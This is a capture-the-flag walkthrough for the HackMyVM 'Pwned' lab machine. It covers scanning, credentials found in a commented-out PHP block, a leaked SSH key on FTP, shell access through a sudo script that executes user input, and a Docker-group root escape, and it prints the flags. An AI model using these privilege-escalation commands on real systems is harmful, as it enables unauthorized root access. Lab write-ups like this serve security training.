HackMyVM - Pwned

Posted on Edited on In Views: Disqus: Word count in article: 998 Reading time ≈ 4 mins.
FTP anonymous access, SSH key leak, and Docker escape.

pwned

pwned

scan

1
2
3
4
5
6
7
8
9
~
❯ rustscan -a  192.168.0.110
...

PORT   STATE SERVICE REASON
21/tcp open  ftp     syn-ack
22/tcp open  ssh     syn-ack
53/tcp open  domain  syn-ack
80/tcp open  http    syn-ack

web

1
2
3
4
5
6
7
8
9
10
11
12
13
<h1>  vanakam nanba (Hello friend) </h1>

        A last note from Attacker :)

                   I am Annlynn. I am the hacker hacked your server with your employees but they don't know how i used them.
                   Now they worry about this. Before finding me investigate your employees first. (LOL) then find me Boomers XD..!!

<!-- I forgot to add this on last note
     You are pretty smart as i thought
     so here i left it for you
     She sings very well. l loved it  -->

Annlynn

dir

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
❯ gobuster dir -u http://192.168.0.110 -w ctf/tool/dic/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
...
/nothing              (Status: 301) [Size: 316] [--> http://192.168.0.110/nothing/]
/server-status        (Status: 403) [Size: 278]
/hidden_text          (Status: 301) [Size: 320] [--> http://192.168.0.110/hidden_text/]
...

http://192.168.0.110/hidden_text/secret.dic

/hacked
/vanakam_nanba
/hackerman.gif
/facebook
/whatsapp
/instagram
/pwned
/pwned.com
/pubg
/cod
/fortnite
/youtube
/kali.org
/hacked.vuln
/users.vuln
/passwd.vuln
/pwned.vuln
/backup.vuln
/.ssh
/root
/home

❯ gobuster dir -u http://192.168.0.110 -w tmp
/pwned.vuln           (Status: 301) [Size: 319] [--> http://192.168.0.110/pwned.vuln/]
...

view-source:http://192.168.0.110/pwned.vuln/

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17

<?php
//	if (isset($_POST['submit'])) {
//		$un=$_POST['username'];
//		$pw=$_POST['password'];
//
//	if ($un=='ftpuser' && $pw=='B0ss_B!TcH') {
//		echo "welcome"
//		exit();
// }
// else
//	echo "Invalid creds"
// }
?>

ftpuser
B0ss_B!TcH

login ftp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
❯ ftp 192.168.0.110
...
ftp> dir
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 0        0            4096 Jul 10  2020 share
226 Directory send OK.
ftp> cd share
250 Directory successfully changed.
ftp> dir
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r--    1 0        0            2602 Jul 09  2020 id_rsa
-rw-r--r--    1 0        0              75 Jul 09  2020 note.txt
226 Directory send OK.
ftp> get id_rsa
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for id_rsa (2602 bytes).
226 Transfer complete.
2602 bytes received in 0.0064 seconds (397.2097 kbytes/s)
ftp> get note.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for note.txt (75 bytes).
226 Transfer complete.
75 bytes received in 0.0064 seconds (11.4952 kbytes/s)
ftp> quit
221 Goodbye.
 
 ❯ cat note.txt

Wow you are here

ariana won't happy about this note

sorry ariana :(

ariana

ssh ariana

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
❯ ssh ariana@192.168.0.110 -i id_rsa
Linux pwned 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Jul 10 13:03:23 2020 from 192.168.18.70
ariana@pwned:~$ ls -la
total 40
drwxrwx--- 4 ariana ariana 4096 Jul 10  2020 .
drwxr-xr-x 5 root   root   4096 Jul 10  2020 ..
-rw-r--r-- 1 ariana ariana  142 Jul 10  2020 ariana-personal.diary
-rw------- 1 ariana ariana    4 Jul 10  2020 .bash_history
-rw-r--r-- 1 ariana ariana  220 Jul  4  2020 .bash_logout
-rw-r--r-- 1 ariana ariana 3526 Jul  4  2020 .bashrc
drwxr-xr-x 3 ariana ariana 4096 Jul  6  2020 .local
-rw-r--r-- 1 ariana ariana  807 Jul  4  2020 .profile
drwx------ 2 ariana ariana 4096 Jul  9  2020 .ssh
-rw-r--r-- 1 ariana ariana  143 Jul 10  2020 user1.txt
ariana@pwned:~$ cat user1.txt
congratulations you Pwned ariana

Here is your user flag ↓↓↓↓↓↓↓

fb8d98be1265dd88bac522e1b2182140

Try harder.need become root

ariana@pwned:~$ cat ariana-personal.diary
Its Ariana personal Diary :::

Today Selena fight with me for Ajay. so i opened her hidden_text on server. now she resposible for the issue.

$ sudo -l
Matching Defaults entries for ariana on pwned:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User ariana may run the following commands on pwned:
    (selena) NOPASSWD: /home/messenger.sh

$ cat /home/messenger.sh
#!/bin/bash

clear
echo "Welcome to linux.messenger "
                echo ""
users=$(cat /etc/passwd | grep home |  cut -d/ -f 3)
                echo ""
echo "$users"
                echo ""
read -p "Enter username to send message : " name
                echo ""
read -p "Enter message for $name :" msg
                echo ""
echo "Sending message to $name "

$msg 2> /dev/null

                echo ""
echo "Message sent to $name :) "
                echo ""

$  sudo -u selena /home/messenger.sh
'alacritty': unknown terminal type.
Welcome to linux.messenger


ariana:
selena:
ftpuser:

Enter username to send message : selena

Enter message for selena :/bin/bash


id
uid=1001(selena) gid=1001(selena) groups=1001(selena),115(docker)

python3 -c "import pty; pty.spawn('/bin/bash');"
selena@pwned:/home/ariana$

selena@pwned:~$ cat user2.txt selena-personal.diary
711fdfc6caad532815a440f7f295c176

You are near to me. you found selena too.

Try harder to catch me
Its Selena personal Diary :::

Today Ariana fight with me for Ajay. so i left her ssh key on FTP. now she resposible for the leak.

selena@pwned:~$ docker run -v /:/mnt --rm -it alpine chroot /mnt sh
# id
uid=0(root) gid=0(root) groups=0(root),1(daemon),2(bin),3(sys),4(adm),6(disk),10(uucp),11,20(dialout),26(tape),27(sudo)
# cd
# ls -la
total 28
drwx------  3 root root 4096 Jul 10  2020 .
drwxr-xr-x 18 root root 4096 Jul  6  2020 ..
-rw-------  1 root root  292 Jul 10  2020 .bash_history
-rw-r--r--  1 root root  601 Jul  6  2020 .bashrc
drwxr-xr-x  3 root root 4096 Jul  4  2020 .local
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
-rw-r--r--  1 root root  429 Jul 10  2020 root.txt
# cat root.txt
4d4098d64e163d2726959455d046fd7c

You found me. i dont't expect this (◎ . ◎)

I am Ajay (Annlynn) i hacked your server left and this for you.

I trapped Ariana and Selena to takeover your server :)


You Pwned the Pwned congratulations :)

share the screen shot or flags to given contact details for confirmation

Telegram   https://t.me/joinchat/NGcyGxOl5slf7_Xt0kTr7g

Instgarm   ajs_walker

Twitter    Ajs_walker